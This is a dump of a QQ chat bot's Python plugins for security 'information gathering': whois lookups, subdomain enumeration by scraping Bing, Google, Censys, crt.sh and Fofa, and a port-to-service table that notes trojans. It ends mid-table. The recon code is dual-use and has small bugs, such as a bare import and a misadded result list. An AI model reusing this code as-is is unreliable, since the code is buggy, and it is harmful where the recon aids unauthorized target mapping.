Allisan 238 | Allison 239 | Allissa 240 | Allister 241 | Allix 242 | Allsun 243 | Allx 244 | Ally 245 | Allyce 246 | Allyn 247 | Allys 248 | Allyson 249 | Alma 250 | Almeda 251 | Almeria 252 | Almerinda 253 | Almeta 254 | Almira 255 | Almire 256 | Alnoor 257 | Aloise 258 | Aloisia 259 | Alok 260 | Alora 261 | Aloysia 262 | Alp 263 | Alparslan 264 | Alphen 265 | Alphonso 266 | Alpine 267 | Alstine 268 | Alta 269 | Altay 270 | Althea 271 | Alvaro 272 | Alvera 273 | Alverta 274 | Alvin 275 | Alvina 276 | Alvinia 277 | Alvira 278 | Alwyn 279 | Aly 280 | Alyce 281 | Alyda 282 | Alys 283 | Alysa 284 | Alyse 285 | Alysia 286 | Alyson 287 | Alyss 288 | Alyssa 289 | Amabel 290 | Amabelle 291 | Amalea 292 | Amalee 293 | Amaleta 294 | Amalia 295 | Amalie 296 | Amalita 297 | Amalle 298 | Amand 299 | Amanda 300 | Amandi 301 | Amandie 302 | Amandip 303 | Amando 304 | Amandy 305 | Amant 306 | Amara 307 | Amargo 308 | Amarjit 309 | Amata 310 | Amato 311 | Amber 312 | Amberly 313 | Ambur 314 | Ame 315 | Amelia 316 | Amelie 317 | -------------------------------------------------------------------------------- /qq机器人脚本/a.py: -------------------------------------------------------------------------------- 1 | import whois 2 | 3 | 4 | 5 | def Whois_check(DNS): 6 | DNS = DNS.strip() 7 | # 检查dns前面是不是有http或者有https://,有替换空 8 | DNS = DNS.replace("http://", '') 9 | DNS = DNS.replace("https://", '') 10 | DNS = DNS.replace("/", '') 11 | 12 | try: 13 | req_whois = whois.whois(DNS) 14 | # print(req_whois) 15 | data = f""" 16 | 查询的域名是:"f{DNS}" 17 | 注册商: 18 | "{str(req_whois["registrar"])}" 19 | 域名服务器: 20 | "{str(req_whois["whois_server"])}" 21 | 推荐网址: 22 | "{str(req_whois["referral_url"])}" 23 | 更新时间: 24 | "{str(req_whois["updated_date"])}" 25 | 创建时间: 26 | "{str(req_whois["creation_date"])}" 27 | 过期时间: 28 | "{str(req_whois["expiration_date"])}" 29 | 名称服务器: 30 | "{str(req_whois["name_servers"])}" 31 | 电子邮件: 32 | "{str(req_whois["emails"])}" 33 | status: 34 | "{str(req_whois["status"])}" 35 | dnssec: 36 | "{str(req_whois["dnssec"])}" 37 | 名称: 38 | "{str(req_whois["name"])}" 39 | 组织: 40 | "{str(req_whois["org"])}" 41 | 城市: 42 | "{str(req_whois["city"])}" 43 | 国家: 44 | "{str(req_whois["country"])}"\n""" 45 | return data 46 | 47 | except Exception as bc: 48 | return "有错误!错误提示" + str(bc) 49 | 50 | 51 | from nonebot import on_command 52 | from nonebot.adapters.onebot.v11 import MessageSegment, Bot, Event 53 | 54 | from nonebot.matcher import Matcher 55 | from nonebot.adapters import Message 56 | from nonebot.params import Arg, CommandArg, ArgPlainText 57 | 58 | ND = on_command("whois", aliases={"whois"}, priority=2, block=True) 59 | 60 | 61 | @ND.handle() 62 | async def handle_first_receive(matcher: Matcher, args: Message = CommandArg()): 63 | plain_text = args.extract_plain_text() # 首次发送命令时跟随的参数,例:/天气 上海,则args为上海 64 | if plain_text: 65 | matcher.set_arg("Name", args) # 如果用户发送了参数则直接赋值 66 | 67 | 68 | @ND.got("Name", prompt="用法:whois 域名") 69 | async def handle_city(Name: Message = Arg(), sname: str = ArgPlainText("Name")): 70 | try: 71 | 72 | await ND.send(Whois_check(sname)) 73 | except Exception as e: 74 | await ND.send("搜图插件出现故障,请联系Mangata") -------------------------------------------------------------------------------- /qq机器人脚本/biaoqingbao.py: -------------------------------------------------------------------------------- 1 | from nonebot.adapters.onebot.v11 import MessageSegment 2 | from nonebot.plugin import on_command 3 | from pathlib import Path 4 | matcher = on_command("表情包") 5 | 6 | @matcher.handle() 7 | async def handle_picture(): 8 | # 本地图片位置 9 | path = Path("/home/kali/qq/qq/qq/plugins/biaoqingbao.jpeg") 10 | # 构造图片消息段 11 | image = MessageSegment.image(path) 12 | # 发送图片 13 | await matcher.finish(image) -------------------------------------------------------------------------------- /qq机器人脚本/cs.py: -------------------------------------------------------------------------------- 1 | import threading 2 | import 3 | 4 | -------------------------------------------------------------------------------- /qq机器人脚本/help.py: -------------------------------------------------------------------------------- 1 | from nonebot import on_keyword 2 | from nonebot.adapters.onebot.v11 import Message 3 | 4 | word=on_keyword({"信息收集"}) 5 | 6 | @word.handle() 7 | async def _(): 8 | help="""信息收集: 9 | whois查询: 10 | 子域名探测:""" 11 | await word.finish(Message(help)) -------------------------------------------------------------------------------- /qq机器人脚本/subdns.py: -------------------------------------------------------------------------------- 1 | # -- coding:UTF-8 -- 2 | from lxml import etree 3 | from urllib.parse import urlparse # urlparse提取url的dns 4 | import requests 5 | from bs4 import BeautifulSoup 6 | import urllib3 7 | import re 8 | import base64 9 | from urllib.parse import quote 10 | 11 | urllib3.disable_warnings() # 忽略https证书告警 12 | 13 | def Bing_DNS_Interface(DNS): #使用bing进行探测 14 | keywords = "site:" + DNS 15 | # keywords = keywords.replace(' ', '+') # 空格用+来代替 16 | # keywords=quote(keywords, 'utf-8') # 进行url编码 17 | headers = { 18 | 'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36" 19 | } 20 | print(keywords) 21 | amount = 3 # 默认页数 22 | Dns_List = [] 23 | for i in range(0, int(amount)): 24 | url = f"https://cn.bing.com/search?q={keywords}&PC=U316&first={i}0&FORM=PERE" 25 | try: 26 | html = requests.get(url=url, headers=headers, verify=False, timeout=5) 27 | # //div[@id="search"]//div//div//div//div//div//div/a[@data-ved]/@href 28 | html = etree.HTML(html.text) 29 | divs = html.xpath(r'//div/h2/a/@href') # 语法 30 | 31 | # print(divs2) 32 | for i in divs: 33 | if DNS in i: 34 | DNS_Res = urlparse(i).netloc # 获得url里面的域名 35 | if not (DNS_Res in Dns_List): # 取反如果Dns_List列表里面有就不添加 36 | Dns_List.append(DNS_Res) 37 | except Exception as bc: 38 | print("有错误!错误提示" + str(bc)) 39 | 40 | return Dns_List 41 | def Climb_Google(DNS): 42 | 43 | keywords = "site:" + DNS 44 | # keywords = keywords.replace(' ', '+') # 空格用+来代替 45 | # keywords=quote(keywords, 'utf-8') # 进行url编码 46 | 47 | Headers = { 48 | 'Host': 'www.google.com.hk', 49 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 50 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 51 | 'Accept-Encoding': 'gzip, deflate', 52 | 'Referer': 'https://www.google.com.hk', 53 | 'sec-ch-ua-platform': "Linux", 54 | 'sec-ch-ua-arch': "x86", 55 | 'Sec-Fetch-Site': 'same-origin', 56 | 'Sec-Fetch-Mode': 'no-cors', 57 | 'Sec-Fetch-Dest': 'empty', 58 | } 59 | Dns_List = [] 60 | 61 | for i in range(0, 3): # 探测3页 62 | url = f"https://www.google.com.hk/search?q={keywords}&hl=zh-CN&start={str(i)}0" 63 | print(url) 64 | try: 65 | html = requests.get(url=url, headers=Headers, verify=False) 66 | html = etree.HTML(html.text) 67 | divs = html.xpath('//div[@id="search"]//div//div//div//div//div//div/a[@data-ved]/@href') # 语法 68 | for DNS in divs: 69 | DNS_Res = urlparse(DNS).netloc # 获得url里面的域名 70 | if not (DNS_Res in Dns_List): # 取反如果Dns_List列表里面有就不添加 71 | Dns_List.append(DNS_Res) 72 | 73 | except IndexError: 74 | print("Google出现问题") 75 | return Dns_List 76 | 77 | def Censys_DNS_Climb_censys(DNS): # 证书探测Censys 78 | 79 | try: 80 | amount = 4 # 默认页数 81 | 82 | Dns_List = [] 83 | headers={ 84 | 'Host': 'search.censys.io', 85 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 86 | 'Accept': '*/*', 87 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 88 | 'Accept-Encoding': 'gzip, deflate', 89 | 'X-Requested-With': 'XMLHttpRequest', 90 | 'Connection': 'close', 91 | 'Referer': 'https://search.censys.io', 92 | 'Sec-Fetch-Dest': 'empty', 93 | 'Sec-Fetch-Mode': 'cors', 94 | 'Sec-Fetch-Site': 'same-origin', 95 | } 96 | 97 | for i in range(int(amount)): 98 | url=f"https://search.censys.io/certificates/_search?q={DNS}&page={i}" 99 | html=requests.get(url=url,headers=headers,verify=False) 100 | soup = BeautifulSoup(html.text, 'lxml') 101 | dns_ = soup.find_all(text=re.compile(rf"{DNS}")) 102 | for i in dns_: # 临时发挥写的现在我也懵看不太懂 103 | a=re.sub('\*=', '', i) 104 | a=a.split(',')[0] 105 | a = a.split('=') 106 | if len(a)==2: 107 | if not (a in Dns_List): # 取反如果Dns_List列表里面有就不添加 108 | Dns_List.append(a[1]) 109 | 110 | #Dns_List=numpy.unique(Dns_List) 111 | return Dns_List 112 | 113 | except Exception as bc: 114 | print("有错误!错误提示" + str(bc)) 115 | 116 | 117 | def Crt_DNS_Climb_Crt(DNS): #Crt证书探测 118 | 119 | headers = { 120 | 'Host': 'crt.sh', 121 | 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 122 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 123 | 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', 124 | 'Accept-Encoding': 'gzip, deflate', 125 | 'Connection': 'close', 126 | 'Upgrade-Insecure-Requests': '1', 127 | 'Sec-Fetch-Dest': 'document', 128 | 'Sec-Fetch-Mode': 'navigate', 129 | 'Sec-Fetch-Site': 'none', 130 | 'Sec-Fetch-User': '?1', 131 | } 132 | 133 | try: 134 | Dns_List=[] 135 | html = requests.get(f"https://crt.sh/?q={DNS}",headers=headers,verify=False) 136 | soup = BeautifulSoup(html.text, 'lxml') 137 | dns_=soup.find_all(text=re.compile(fr".{DNS}")) 138 | 139 | for i in range(2,len(dns_)): 140 | if not (dns_[i] in Dns_List): # 取反如果Dns_List列表里面有就不添加 141 | Dns_List.append(dns_[i]) 142 | #print(Dns_List) 143 | return Dns_List 144 | except Exception as bc: 145 | print("有错误!错误提示" + str(bc)) 146 | 147 | 148 | # 目前用不了 149 | def Fofa_Dns_Request(DNS): 150 | try: 151 | DNS = f'domain="{DNS}"' 152 | DNS = base64.b64encode(DNS.encode('utf-8')).decode("utf-8") 153 | 154 | 155 | Dns_List = [] 156 | headers = { 157 | "user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36" 158 | } 159 | # 请求 160 | html=requests.get("https://fofa.info/result?qbase64="+str(DNS),headers=headers) 161 | html = etree.HTML(html.text) 162 | divs = html.xpath(r'//span[@class="aSpan"]//@href') # 探测IP 163 | 164 | 165 | for DNS in divs: 166 | DNS_Res = urlparse(DNS).netloc # 获得url里面的域名 167 | if not (DNS_Res in Dns_List): # 取反如果Dns_List列表里面有就不添加 168 | Dns_List.append(DNS_Res) 169 | return Dns_List 170 | 171 | except Exception as bc: 172 | print("有错误!错误提示" + str(bc)) 173 | 174 | 175 | from nonebot import on_command 176 | 177 | from nonebot.matcher import Matcher 178 | from nonebot.adapters import Message 179 | from nonebot.params import Arg, CommandArg, ArgPlainText 180 | 181 | ND = on_command("子域名查询", priority=2) 182 | 183 | 184 | @ND.handle() 185 | async def handle_first_receive(matcher: Matcher, args: Message = CommandArg()): 186 | plain_text = args.extract_plain_text() # 首次发送命令时跟随的参数,例:/天气 上海,则args为上海 187 | if plain_text: 188 | matcher.set_arg("Name", args) # 如果用户发送了参数则直接赋值 189 | 190 | 191 | @ND.got("Name", prompt="用法:子域名查询 域名") 192 | async def handle_city(Name: Message = Arg(), sname: str = ArgPlainText("Name")): 193 | 194 | try: 195 | Dns_List = [] # 统计 196 | #---------------bing探测------------------------------ 197 | await ND.send("正在用搜索引擎进行探测DNS") 198 | Bing = Bing_DNS_Interface(sname) 199 | Dns_List+=Bing # 统计 200 | for i in Bing: 201 | print('bing输出:'+i) 202 | await ND.send(i) 203 | #------------------------------------------------------ 204 | 205 | # ---------------Google探测------------------------------ 206 | Google = Climb_Google(sname) 207 | diff_list = list(set(Google) - set(Dns_List)) # 用于检查没有出来的域名进行输出 208 | for i in diff_list: 209 | print('Google输出:' + i) 210 | await ND.send(i) 211 | Dns_List += Google # 统计 212 | # ------------------------------------------------------ 213 | 214 | 215 | # ---------------Censys探测------------------------------ 216 | await ND.send("正在用证书进行探测DNS") 217 | censys=Censys_DNS_Climb_censys(sname) 218 | diff_list = list(set(censys) - set(Dns_List)) # 用于检查没有出来的域名进行输出 219 | for i in diff_list: 220 | print('Censys输出:'+i) 221 | await ND.send(i) 222 | Dns_List += censys # 统计 223 | # ------------------------------------------------------ 224 | 225 | # ---------------crt探测------------------------------ 226 | crt = Crt_DNS_Climb_Crt(sname) # crt证书探测 227 | diff_list = list(set(crt) - set(Dns_List)) # 用于检查没有出来的域名进行输出 228 | for i in diff_list: 229 | print('crt输出:'+i) 230 | await ND.send(i) 231 | Dns_List += censys # 统计 232 | # ------------------------------------------------------ 233 | 234 | except Exception as e: 235 | await ND.send("出现问题请联系赛赛") -------------------------------------------------------------------------------- /qq机器人脚本/tcpudp.py: -------------------------------------------------------------------------------- 1 | tcp = {'0': '无效端口,通常用于分析操作系统', '1': '传输控制协议端口服务多路开关选择器', '2': '管理实用程序', '3': '压缩进程', '5': '远程作业登录', '7': '回显', 2 | '9': '丢弃', '11': '在线用户', '13': '时间', '17': '每日引用', '18': '消息发送协议', '19': '字符发生器', '20': 'FTP文件传输协议(默认数据口)', 3 | '21': 'FTP文件传输协议(控制)', '22': 'SSH远程登录协议', '23': 'telnet(终端仿真协议),木马Tiny Telnet Server开放此端口', 4 | '24': '预留给个人用邮件系统', '25': 'SMTP服务器所开放的端口,用于发送邮件', '27': 'NSW 用户系统 FE', '29': 'MSG ICP', 5 | '31': 'MSG验证,木马Master Paradise、HackersParadise开放此端口', '33': '显示支持协议', '35': '预留给个人打印机服务', '37': '时间', 6 | '38': '路由访问协议', '39': '资源定位协议', '41': '图形', '42': '主机名服务', '43': 'who is服务', '44': 'MPM(消息处理模块)标志协议', 7 | '45': '消息处理模块', '46': '消息处理模块(默认发送口)', '47': 'NI FTP', '48': '数码音频后台服务', '49': 'TACACS登录主机协议', 8 | '50': '远程邮件检查协议', '51': 'IMP(接口信息处理机)逻辑地址维护', '52': '施乐网络服务系统时间协议', '53': 'dns域名服务器', '54': '施乐网络服务系统票据交换', 9 | '55': 'ISI图形语言', '56': '施乐网络服务系统验证', '57': '预留个人用终端访问', '58': '施乐网络服务系统邮件', '59': '预留个人文件服务', '60': '未定义', 10 | '61': 'NI邮件', '62': '异步通讯适配器服务', '63': 'whois++', '64': '通讯接口', '65': 'TACACS数据库服务', '66': 'Oracle SQL*NET', 11 | '67': '引导程序协议服务端', '68': '引导程序协议客户端', '69': '小型文件传输协议', '70': '信息检索协议', '71': '远程作业服务', '72': '远程作业服务', 12 | '73': '远程作业服务', '74': '远程作业服务', '75': '预留给个人拨出服务', '76': '分布式外部对象存储', '77': '预留给个人远程作业输入服务', '78': '修正TCP', 13 | '79': '查询远程主机在线用户等信息', '80': 'http,用于网页浏览,木马Executor开放此端口', '81': 'HOST2名称服务', '82': '传输实用程序', 14 | '83': '模块化智能终端ML设备', '84': '公用追踪设备', '85': '模块化智能终端ML设备', '86': 'Micro Focus Cobol编程语言', '87': '预留给个人终端连接', 15 | '88': 'Kerberros安全认证系统', '89': 'SU/MIT telnet(终端仿真网关)', '90': 'DNSIX 安全属性标记图', '91': 'MIT Dover假脱机', 16 | '92': '网络打印协议', '93': '设备控制协议', '94': 'Tivoli对象调度', '96': 'DIXIE协议规范', '97': '快速远程虚拟文件协议', '98': 'TAC新闻协议', 17 | '99': '后门程序ncx99开放此端口', '100': '未知用途', '101': 'NIC 主机名称服务', '102': '消息传输代理', '103': 'Genesis 点对点传输网络', 18 | '105': '信箱名称服务', '106': '3COM-TSMUX开放端口', '107': '远程Telnet服务', '108': 'SNA 网关访问服务', 19 | '109': 'POP2服务器开放此端口,用于接收邮件', '110': 'POP3服务器开放此端口,用于接收邮件', '111': 'SUN公司的RPC服务所有端口', '112': 'McIDAS 数据传输协议', 20 | '113': '认证服务,用于鉴别TCP连接的用户', '114': '音频新闻多点服务', '115': '简单文件传输服务', '116': 'ANSA REX 通知', '117': 'UUCP 路径服务', 21 | '118': 'SQL 服务', '119': 'NEWS新闻组传输协议,承载USENET通信', '121': '木马BO jammerkillahV开放端口', '122': 'SMAKY网络', 22 | '123': '网络时间协议,蠕虫病毒会利用,一般关闭', '128': 'GSS X许可认证', '129': '密码生成器协议', '130': 'Cisco软件开放端口', 23 | '131': 'Cisco软件开放端口', '132': 'Cisco软件开放端口', '133': '统计服务', '134': 'INGRES-网络服务', 24 | '135': 'DCOM服务,冲击波病毒利用,不能关闭', '136': '命名系统', '137': 'NETBIOS协议应用,为共享开放', '138': 'NETBIOS协议应用,为共享开放', 25 | '139': 'NETBIOS协议应用,为共享开放', '140': 'EMFIS数据服务', '141': 'EMFIS控制服务', '143': 'Interim邮件访问协议', 26 | '144': 'UMA软件开放端口', '145': 'UAAC协议', '149': 'AED 512仿真服务', '150': 'SQL(结构化查询语言)-网络', '152': '后台文件传输协议', 27 | '156': 'SQL(结构化查询语言)服务', '158': 'PC邮件服务器', '159': 'NSS-路由', '160': 'SGMP-陷阱', '161': '简单网络管理协议', 28 | '162': 'SNMP陷阱', '163': 'CMIP/TCP 管理', '164': 'CMIP/TCP 代理', '166': 'Sirius系统', '169': '发送', '170': '网络附言', 29 | '177': 'x显示管理控制协议,入侵者通过它访问X-windows操作台', '178': 'NextStep Window 服务', '179': '边界网关协议', '180': '图表', 30 | '181': '统一', '184': 'OC服务器', '185': '远程-KIS', '186': 'KIS 协议', '187': '应用通信接口', '189': '队列文件传输', 31 | '190': '网关进入控制协议', '191': 'Prospero 目录服务', '192': 'OSU 网络监视系统', '193': 'Spider 远程控制协议', '194': '多线交谈协议', 32 | '197': '目录地址服务', '198': '目录地址服务监视器', '200': 'IBM系统资源控制器', '201': 'AppleTalk(Mac机所用的网络协议)路由保证', 33 | '202': 'AppleTalk(Mac机所用的网络协议)Name Binding', '203': 'AppleTalk(Mac机所用的网络协议)未用端口', 34 | '204': 'AppleTalk(Mac机所用的网络协议)回显', '205': 'AppleTalk(Mac机所用的网络协议)未用端口', '206': 'AppleTalk(Mac机所用的网络协议)区信息', 35 | '207': 'AppleTalk(Mac机所用的网络协议)未用端口', '208': 'AppleTalk(Mac机所用的网络协议)未用端口', '209': '快速邮件传输协议', 36 | '210': 'ANSI(美国国家标准协会)Z39.50', '211': 'Texas Instruments 914C/G终端', '213': 'IPX(以太网所用的协议)', 37 | '218': 'Netix消息记录协议', '219': 'Unisys ARPs', '220': '交互邮件访问协议 v3', '223': '证书分发中心', '224': 'masq拨号器', 38 | '241': '预留端口 (224-241)', '245': '链接', '246': '显示系统协议', '257': '安全电子交易系统', '258': 'Yak Winsock 个人聊天', 39 | '259': '有效短程遥控', '260': '开放端口', '261': 'IIOP 基于TLS/SSL的命名服务', '266': 'SCSI(小型计算机系统接口)on ST', 40 | '267': 'Tobit David服务层', '268': 'Tobit David复制', '281': '个人连结', '282': 'Cable端口A/X', '286': 'FXP通信', 41 | '308': 'Novastor备份', '313': 'Magenta逻辑', '318': 'PKIX时间标记', '333': 'Texar安全端口', '344': 'Prospero数据存取协议', 42 | '345': 'Perf分析工作台', '346': 'Zebra服务器', '347': 'Fatmen服务器', '348': 'Cabletron管理协议', '358': 'Shrink可上网家电协议', 43 | '359': '网络安全风险管理协议', '362': 'SRS发送', '363': 'RSVP隧道', '372': '列表处理', '373': 'Legend公司', '374': 'Legend公司', 44 | '376': 'AmigaEnvoy网络查询协议', '377': 'NEC公司', '378': 'NEC公司', '379': 'TIA/EIA/IS-99调制解调器客户端', 45 | '380': 'TIA/EIA/IS-99调制解调器服务器', '381': 'hp(惠普)性能数据收集器', '382': 'hp(惠普)性能数据控制节点', '383': 'hp(惠普)性能数据警报管理', 46 | '384': '远程网络服务器系统', '385': 'IBM应用程序', '386': 'ASA信息路由器定义文件.', '387': 'Appletalk更新路由.', '389': '轻型目录访问协议', 47 | '395': '网络监视控制协议', '396': 'Novell(美国Novell公司)Netware(Novell公司出的网络操作系统)over IP', '400': '工作站解决方案', 48 | '401': '持续电源', '402': 'Genie协议', '406': '交互式邮件支持协议', '408': 'Prospero资源管理程序', '409': 'Prospero资源节点管理.', 49 | '410': 'DEC(数据设备公司)远程调试协议', '411': '远程MT协议', '412': '陷阱协定端口', '413': '存储管理服务协议', '414': '信息查询', '415': 'B网络', 50 | '423': 'IBM操作计划和控制开端', '424': 'IBM操作计划和控制追踪', '425': '智能计算机辅助设计', '427': '服务起位置', '434': '移动ip代理', 51 | '435': '移动ip管理', '443': '基于TLS/SSL的网页浏览端口,能提供加密和通过安全端口传输的另一种HTTP', '444': '简单网络内存分页协议', 52 | '445': 'Microsoft-DS,为共享开放,震荡波病毒利用,一般应关闭', '446': 'DDM-远程关系数据库访问', '447': 'DDM-分布式文件管理', 53 | '448': 'DDM-使用安全访问远程数据库', '456': '木马HACKERS PARADISE开放此端口', '458': 'apple quick time软件开放端口', 54 | '459': 'ampr-rcmd命令', '464': 'k密码服务', '469': '广播控制协议', '470': 'scx-代理', '472': 'ljk-登陆', '481': 'Ph服务', 55 | '487': '简单异步文件传输', '489': 'nest-协议', '491': 'go-登陆', '499': 'ISO ILL协议', 56 | '500': 'Internet密钥交换,Lsass开放端口,不能关闭', '509': '陷阱', '510': 'FirstClass协议', '512': '远程进程执行', '513': '远程登陆', 57 | '514': 'cmd命令', '515': 'spooler', '516': '可视化数据', '518': '交谈', '519': 'unix时间', '520': '扩展文件名称服务器', 58 | '525': '时间服务', '526': '新日期', '529': '在线聊天系统服务', '530': '远程过程调用', '531': '聊天', '532': '读新闻', '533': '紧急广播端口', 59 | '534': 'MegaMedia管理端', '537': '网络流媒体协议', '542': '商业', '543': 'Kerberos(软件)v4/v5', '544': 'krcmd命令', 60 | '546': 'DHCPv6 客户端', '547': 'DHCPv6 服务器', '552': '设备共享', '554': 'Real Time Stream控制协议', 61 | '555': '木马PhAse1.0、Stealth Spy、IniKiller开放此端口', '556': '远距离文件服务器', '563': '基于TLS/SSL的网络新闻传输协议', 62 | '564': 'plan 9文件服务', '565': 'whoami查询', '566': 'streettalk', '567': 'banyan-rpc(远程过程调用)', '568': 'DPA成员资格', 63 | '569': 'MSN成员资格', '570': 'demon(调试监督程序)', '571': 'udemon(调试监督程序)', '572': '声纳', '573': 'banyan-贵宾', 64 | '574': 'FTP软件代理系统', '581': 'Bundle Discovery 协议', '582': 'SCC安全', '583': 'Philips视频会议', '584': '密钥服务器', 65 | '585': 'IMAP4+SSL (Use 993 instead)', '586': '密码更改', '587': '申请', '589': 'Eye连结', '595': 'CAB协议', 66 | '597': 'PTC名称服务', '598': 'SCO网络服务器管理3', '599': 'Aeolon Core协议', '600': 'Sun IPC(进程间通讯)服务器', 67 | '601': '可靠系统登陆服务', '604': '通道', '606': 'Cray统一资源管理', '608': '发送人-传递/提供 文件传输器', '609': 'npmp-陷阱', 68 | '610': 'npmp-本地', '611': 'npmp-pecmdline_gui( 图形用户界面)', '612': 'HMMP指引', '613': 'HMMP操作', 69 | '614': 'SSL(加密套接字协议层)shell(壳)', '615': 'Internet配置管理', '616': 'SCO(Unix系统)系统管理服务器', '617': 'SCO桌面管理服务器', 70 | '619': 'Compaq(康柏公司)EVM', '620': 'SCO服务器管理', '623': 'ASF远程管理控制协议', '624': 'Crypto管理', 71 | '631': 'IPP (Internet打印协议)', '633': '服务更新(Sterling软件)', '637': '局域网服务器', '641': 'repcmd命令', 72 | '647': 'DHCP(动态主机配置协议)Failover', '648': '注册登记协议(RRP)', '649': 'Cadview-3d软件协议', 73 | '666': '木马Attack FTP、Satanz Backdoor开放此端口', '808': 'ccproxy http/gopher/ftp (over http)协议', 74 | '1001': '木马Silencer,WebEx开放端口', '1011': '木马Doly开放端口', '1024': '动态端口的开始,木马yai开放端口', 75 | '1025': 'inetinfo.exe(互联网信息服务)木马netspy开放端口', '1026': 'inetinfo.exe(互联网信息服务)', '1027': '应用层网关服务', 76 | '1030': '应用层网关服务', '1031': 'BBN IAD', '1033': '本地网络信息端口', '1034': '同步通知', '1036': '安全部分传输协议', 77 | '1070': '木马Psyber Stream,Streaming Audio开放端口', '1071': '网络服务开放端口', '1074': '网络服务开放端口', 78 | '1080': 'Socks这一协议以通道方式穿过防火墙,允许防火墙后面的人通过一个IP地址', '1110': '卡巴斯基反病毒软件开放此端口', '1125': '卡巴斯基反病毒软件开放此端口', 79 | '1203': '许可证生效端口', '1204': '登陆请求监听端口', '1206': 'Anthony数据端口', '1222': 'SNI R&D网络端口', '1233': '普遍的附录服务器端口', 80 | '1234': '木马SubSeven2.0、Ultors Trojan开放此端口', '1243': '木马SubSeven1.0/1.9开放此端口', 81 | '1245': '木马Vodoo,GabanBus,NetBus,Vodoo开放此端口', '1273': 'EMC-网关端口', '1289': 'JWalk服务器端口', '1290': 'WinJa服务器端口', 82 | '1333': '密码策略(网络服务)(svchost.exe)', '1334': '网络服务(svchost.exe)', '1335': '数字公正协议', 83 | '1336': '即时聊天协议(svchost.exe)', '1349': '注册网络协议端口', '1350': '注册网络协议端口', '1371': '富士通配置协议端口', 84 | '1372': '富士通配置协议端口', '1374': 'EPI软件系统端口', '1376': 'IBM个人-个人软件端口', '1377': 'Cichlid许可证管理端口', 85 | '1378': 'Elan许可证管理端口', '1380': 'Telesis网络许可证管理端口', '1381': '苹果网络许可证管理端口', '1386': 'CheckSum 许可证管理端口', 86 | '1387': '系统开放端口(rundll32.exe)', '1388': '数据库高速缓存端口', '1389': '文档管理端口', '1390': '存储控制器端口', 87 | '1391': '存储器存取服务器端口', '1392': '打印管理端口', '1393': '网络登陆服务器端口', '1394': '网络登陆客户端端口', '1395': 'PC工作站管理软件端口', 88 | '1396': 'DVL活跃邮件端口', '1397': '音频活跃邮件端口', '1398': '视频活跃邮件端口', '1399': 'Cadkey许可证管理端口', 89 | '1433': 'Microsoft的SqlServer服务开放端口', '1434': 'Microsoft的SQL服务监视端口', '1492': '木马FTP99CMP开放此端口', 90 | '1509': '木马Psyber Streaming Server开放此端口', '1512': 'Microsoft Windows网络名称服务', 91 | '1524': '许多攻击脚本安装一个后门SHELL于这个端口', '1600': '木马Shivka-Burka开放此端口', '1645': '远程认证拨号用户服务', '1701': '第2层隧道协议', 92 | '1731': 'NetMeeting音频调用控制', '1801': 'Microsoft消息队列服务器', '1807': '木马SpySender开放此端口', 93 | '1900': '可被利用ddos攻击,一般关闭', '1912': '金山词霸开放此端口', '1981': '木马ShockRave开放此端口', '1999': '木马BackDoor,yai开放此端口', 94 | '2000': '木马GirlFriend 1.3、Millenium 1.0开放此端口', '2001': '木马Millenium 1.0、Trojan Cow,黑洞2001开放此端口', 95 | '2003': 'GNU 查询', '2023': '木马Pass Ripper开放此端口', '2049': 'NFS程序常运行于此端口', '2115': '木马Bugs开放此端口', 96 | '2140': '木马Deep Throat 1.0/3.0,The Invasor开放此端口', '2500': '应用固定端口会话复制的RPC客户', '2504': '网络平衡负荷', 97 | '2565': '木马Striker开放此端口', '2583': '木马Wincrash 2.0开放此端口', '2801': '木马Phineas Phucker开放此端口', 98 | '2847': '诺顿反病毒服务开放此端口', '3024': '木马WinCrash开放此端口', '3128': 'squid http代理服务器开放此端口', 99 | '3129': '木马Master Paradise开放此端口', '3150': '木马The Invasor,deep throat开放此端口', '3210': '木马SchoolBus开放此端口', 100 | '3306': 'MySQL开放此端口', '3333': '木马Prosiak开放此端口', '3389': '远程桌面的服务端口', 101 | '3456': 'inetinfo.exe(互联网信息服务)开放端口,VAT默认数据', '3457': 'VAT默认控制', '3527': 'Microsoft消息队列服务器', 102 | '3700': '木马Portal of Doom开放此端口', '3996': '木马RemoteAnything开放此端口', '4000': '腾讯QQ客户端开放此端口', 103 | '4060': '木马RemoteAnything开放此端口', '4092': '木马WinCrash开放此端口', '4133': 'NUTS Bootp服务器', 104 | '4134': 'NIFTY-Serve HMI协议', '4141': 'Workflow服务器', '4142': '文档服务器', '4143': '文档复制', '4145': 'VVR控制', 105 | '4321': '远程Who Is查询', '4333': '微型sql服务器', '4349': '文件系统端口记录', '4350': '网络设备', '4351': 'PLCY网络服务', 106 | '4453': 'NSS警报管理', '4454': 'NSS代理管理', '4455': 'PR聊天用户', '4456': 'PR聊天服务器', '4457': 'PR注册', 107 | '4480': 'Proxy+ HTTP代理端口', '4500': 'Lsass开放端口,不能关闭', '4547': 'Lanner许可管理', '4555': 'RSIP端口', 108 | '4590': '木马ICQTrojan开放此端口', '4672': '远程文件访问服务器', '4752': '简单网络音频服务器', '4800': 'Icona快速消息系统', 109 | '4801': 'Icona网络聊天', '4802': 'Icona许可系统服务器', '4848': 'App服务器-Admin HTTP', '4849': 'App服务器-Admin HTTPS', 110 | '4950': '木马IcqTrojan开放5000端口', '5000': '木马blazer5,Sockets de Troie开放5000端口,一般应关闭', 111 | '5001': '木马Sockets de Troie开放5001端口', '5006': 'wsm服务器', '5007': 'wsm服务器ssl', '5022': 'mice服务器', 112 | '5050': '多媒体会议控制协议', '5051': 'ITA代理', '5052': 'ITA管理', '5137': 